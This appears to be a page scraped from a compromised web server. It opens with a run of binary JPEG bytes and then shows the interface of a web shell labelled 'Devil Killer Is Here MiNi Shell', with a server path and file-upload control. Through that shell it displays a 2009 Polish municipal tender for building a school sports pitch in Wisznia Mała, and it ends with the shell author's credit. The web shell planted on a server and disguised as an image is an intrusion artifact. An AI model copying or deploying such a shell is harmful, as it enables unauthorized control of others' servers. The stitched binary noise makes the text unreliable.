JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/304860-N-2009.html

<p class="kh_header"><b>Wisznia Mała: Budowa wielofunkcyjnego boiska sportowego przy Szkole Podstawowej 
w Wiszni Małej</b><br>
<b>Numer ogłoszenia: 304860 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wisznia Mała , ul. Wrocławska 9, 55-114 Wisznia Mała, woj. dolnośląskie, tel. 071 3127025, faks 071 3127068.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiszniamala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielofunkcyjnego boiska sportowego przy Szkole Podstawowej 
w Wiszni Małej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie boiska wielofunkcyjnego o nawierzchni poliuretanowej w kolorze zielonym,  na podbudowie tłuczniowej o wymiarach 28x44m  obejmujące w szczególności: 
a) przygotowanie terenu pod budowę - roboty ziemne; 
b) wykonanie podbudowy pod boisko wielofunkcyjne;
c) ułożenie wierzchniej warstwy poliuretanowej; 
d) wykonanie ogrodzenia boiska siatką plecioną ocynkowaną o wymiarach oczek max. 45x45 mm o stałej wysokości 4 m na długości 90 m, o konstrukcji wspartej na stalowych ocynkowanych słupach okrągłych o przekroju 60,3x3,3 mm  i długości przęsła 2,5 m,
e)Wykonanie  furtki o wymiarach LxH=1,30x2,30m i bramy technicznej LxH=3,00x2,5m wyposażonych w akcesoria zamki, blokady i zawiasy systemowe,
f) Wykonanie piłkołapów z dwóch stron boiska z paneli stalowych ocynkowanych 5x20 mm z drutu O6/2xO8 o wysokości 6m na długości 35 m. Konstrukcja piłkołapów - słupy z przyporami z profili zimnogiętych  ocynkowanych o profilu prostokątnym 80x40x2mm. Wykonanie wsporników o wysięgu 50cm pod zawieszenie siatek polipropylenowych na słupkach piłkołapów, 
g)  Wykonanie piłkołapów z dwóch stron boiska z paneli stalowych ocynkowanych 5x20 z drutu O6/2xO6 o wysokości 4,0m na długości 23 m ze słupków bez przypór z profili zimnogiętych ocynkowanych o profilu prostokątnym 80x40x2mm; 
h) Zawieszenie siatek polipropylenowych z linki średnicy 5mm i oczkach siatki 10x10cm i  obciążenie dołu siatek polipropylenowych przez zamocowanie linki ołowianej obciążającej,
i) ułożenie chodnika z kostki kamiennej granitowej szarej-  327,40 m2 
j) ułożenie chodnika z płyt kamiennych granitowych płomieniowanych o wym. 50x50  - 73,00 m2 
k) wykonanie oświetlenia boiska,
l) wykonanie odwodnienia terenu,
m) dostawę i montaż urządzeń sportowych ( 4 kosze do gry w piłkę koszową, 1 zestaw do gry w siatkówkę, 2 bramki do piłki ręcznej) oraz elementy małej architektury (ławki metalowe z drewnianym siedziskiem -  szt 10, kosze na śmieci - metalowe ocynkowane lakierowane - szt. 4 - stojaki na rowery 6 stanowiskowe -  szt. 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 5 000,00 zł ( pięć tysięcy złotych).
2.	Wadium wnosi się przed upływem terminu na  składanie ofert. 
3.	Wadium może być wniesione w następujących formach: 
a)pieniądzu, 
b)poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej z tym, że poręczenie Kasy jest zawsze poręczeniem pieniężnym, 
c)gwarancjach bankowych, 
d)gwarancjach ubezpieczeniowych, 
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 punkt 2 ustawy z dn. 09.11.2000r. o utworzeniu Polskiej Agencji  Rozwoju Przedsiębiorczości. 
4. Wadium wnoszone w pieniądzu wpłaca się przelewem z rachunku bankowego  na rachunek bankowy wskazany przez Zamawiającego tj:  
Gmina Wisznia Mała 
 Bank Spółdzielczy w Trzebnicy nr konta: 72 9591 0004 2001 0020 0514 0002. 
Na poleceniu przelewu należy zaznaczyć, jakiego przetargu i jakiego zadania wadium dotyczy. Do oferty należy dołączyć kopię dokumentu potwierdzającego wpłatę wadium. 
5. Wadium w formie poręczeń, gwarancji należy złożyć w oryginale w miejscu składania ofert, to jest w Gminie Wisznia Mała ul. Wrocławska 9 pok. Nr 3, w terminie nie późniejszym niż termin składania ofert lub dołączyć do oferty. 
6. W przypadku wniesienia wadium w formie poręczeń, gwarancji bankowych, ubezpieczeniowych, ich treść ma być zgodna z załączonym wzorem 2.6 (bezwarunkowa i na pierwsze żądanie, obejmująca okres związania ofertą - art. 85 Pzp ).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia zgodnie z art. 22 ustawy pzp mogą ubiegać się wykonawcy, którzy:
1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
W celu potwierdzenia spełniania tego warunku Wykonawca dostarczy:
	a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,   
	W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej składają zaświadczenie o nie zaleganiu w podatku dochodowym od osób fizycznych i odrębne zaświadczenie o nie zaleganiu przez spółkę w podatku od towarów i usług.  
(w załączniku nr 1 do SIWZ w zestawie dokumentów wymaganych od Wykonawców poz. Nr 5) 

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
W celu potwierdzenia spełniania tego warunku Wykonawca dostarczy:
a) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, 
tj. w okresie  ostatnich pięciu lat zrealizowali minimum dwa zamówienia  o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj.: wykonali co najmniej  dwa boiska o nawierzchni poliuretanowej z podaniem ich wartości, przedmiotu oraz daty i miejsca wykonania.
Wykazane roboty muszą być poparte dokumentami wystawionymi przez Inwestora potwierdzającymi, że zostały one wykonane należycie. Wykonawca przedstawi opis rodzaju robót, podać ich wartość, wielkość oraz daty i miejsca wykonania.
(w załączniku nr 1 do SIWZ w zestawie dokumentów wymaganych od Wykonawców poz. Nr 6)
b) wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. 
 tj, dysponują osobami posiadającymi stosowne uprawnienia budowlane do kierowania robotami w zakresie zgodnym z przedmiotem zamówienia tj. uprawnienia ogólnobudowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń oraz posiadającymi aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa. 
(w załączniku nr 1 do SIWZ w zestawie dokumentów wymaganych od Wykonawców poz. Nr 4 wzór 2.3 i poz. 7 i 8)
	
3.Znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia.   
W celu potwierdzenia spełniania tego warunku Wykonawca dostarczy:
a) oświadczenie, że nie podlega wykluczeniu na podstawie art. 24 ustawy pzp 
(w załączniku nr 1 do SIWZ w zestawie dokumentów wymaganych od Wykonawców poz. Nr 2 wzór 2.1)

4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia: 
W celu potwierdzenia spełnienia tego warunku wykonawca dostarczy wraz z ofertą:  

a) oświadczenie, że nie podlega wykluczeniu na podstawie art. 24 ustawy pzp 
(w załączniku nr 1 do SIWZ w zestawie dokumentów wymaganych od Wykonawców poz. Nr 2 wzór 2.1)
b) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.  1 pkt 4-9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składana ofert
(w załączniku nr 1 do SIWZ w zestawie dokumentów wymaganych od Wykonawców poz. Nr 14)

5. Spełnienie przez oferowaną nawierzchnię i wyposażenia boiska wymagań Zamawiającego określonych w dokumentacji przetargowej:
W celu potwierdzenie spełnienia tego warunku wykonawca dostarczy wraz z ofertą: 
 a) oświadczenie, iż oferowana przez Wykonawcę nawierzchnia boiska spełnia wymagania określone w niniejszym SIWZ, STWiOR, oraz projektu budowlanego (wzór 2.8) 
Wraz z ww oświadczeniem Wykonawca musi do oferty dołączyć dokumenty potwierdzające iż oferowana nawierzchnia spełnia parametry określone wyżej to jest:  
- Badania na zgodność z normą PN-EN 14877, lub aprobatę techniczną ITB, lub rekomendację techniczną ITB lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe np. Labosport.
- Kartę techniczną oferowanej nawierzchni potwierdzona przez jej producenta.
- Atest PZH dla oferowanej nawierzchni.
- Autoryzację producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej wg zasady spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy w sprawie ubiegania się o zamówienie publiczne 
(wzór nr 2.1.a )                                                                          
Oświadczenie Wykonawcy o informacjach stanowiących tajemnicę przedsiębiorstwa (brak oświadczenia będzie skutkować jawnością całej oferty) (wzór nr 2.2 )
 Wykaz osób i podmiotów, które  będą uczestniczyć w wykonywaniu zamówienia - (wzór nr  2.3)
Aktualny Odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia ,a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie ,odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia , z podaniem ich wartości oraz daty i miejsca wykonania -  (wzór  nr  2.4 ) wraz z  załączeniem dokumentów potwierdzających ,że roboty te zostały wykonane należycie.( wzór nr 2.4a)  
Uprawnienia budowlane osoby wskazanej do pełnienia funkcji kierownika budowy oraz branżowych kierowników robót zgodne z zakresem przedmiotu zamówienia, 
Aktualne zaświadczenia z Izby Inżynierów Budownictwa o przynależności do Izby osób pełniących samodzielne funkcje w budownictwie. ( j.w.)
Zbiorcze zestawienie kosztów ( wzór 2.5) 
Oświadczenie Wykonawcy w sprawie nawierzchni syntetycznej ( wzór  2.8) wraz z: 
- Badania na zgodność z norma PN-EN 14877, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe np. Labosport.
- Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
- Atest PZH dla oferowanej nawierzchni.
- Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.  1 pkt 4-9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składana ofert;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wisznimala.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wisznia Mała, ul.Wrocławska 9, 55-114 Wisznia Mała, pok.4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 09:45, miejsce: Urząd Gminy Wisznia Mała, ul.Wrocławska 9, 55-114 Wisznia Mała, pok.4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com